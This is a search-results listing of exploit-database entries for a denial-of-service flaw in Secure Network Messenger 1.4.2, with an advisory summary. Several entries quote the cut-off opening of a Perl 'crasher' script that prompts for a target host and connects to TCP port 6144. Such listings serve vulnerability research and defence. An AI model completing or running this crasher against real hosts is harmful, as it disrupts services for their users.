6 matches found
Secure Network Messenger <= 1.4.2 Denial of Service Exploit
Exploit for unknown platform in category dos / poc =========================================================== Secure Network Messenger ; chomp $h; $socks = IO::Socket::INET-new Proto = "tcp", PeerPort = "6144", PeerAddr = "$h" or die "\nNo response from host."; sleep 1; print "\nSuccesfully...
Secure Network Messenger 1.4.2 - Denial of Service
Secure Network Messenger 1.4.2 - Denial of Service !/usr/bin/perl use IO::Socket; print "\nSecure Network Messenger Crasher by ClearScreen\n"; print "\nEnter host to crash: "; $h = ; chomp $h; $socks = IO::Socket::INET-new Proto = "tcp", PeerPort = "6144", PeerAddr = "$h" or die "\nNo response fr...
Secure Network Messenger <= 1.4.2 Denial of Service Exploit
No description provided by source. !/usr/bin/perl use IO::Socket; print "\nSecure Network Messenger Crasher by ClearScreen\n"; print "\nEnter host to crash: "; $h = STDIN; chomp $h; $socks = IO::Socket::INET-new Proto = "tcp", PeerPort = "6144", PeerAddr = "$h" or die "\nNo response from host.";...
Secure Network Messenger 1.4.2 - Denial of Service
!/usr/bin/perl use IO::Socket; print "\nSecure Network Messenger Crasher by ClearScreen\n"; print "\nEnter host to crash: "; $h = ; chomp $h; $socks = IO::Socket::INET-new Proto = "tcp", PeerPort = "6144", PeerAddr = "$h" or die "\nNo response from host."; sleep 1; print "\nSuccesfully connected ...
SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service
SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service source: https://www.securityfocus.com/bid/11670/info A remote denial of service vulnerability affects SecureAction Research Secure Network Messenger. This issue is due to a failure of the application to properly handl...
SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service
source: https://www.securityfocus.com/bid/11670/info A remote denial of service vulnerability affects SecureAction Research Secure Network Messenger. This issue is due to a failure of the application to properly handle exceptional network data. An attacker may leverage this issue to cause a...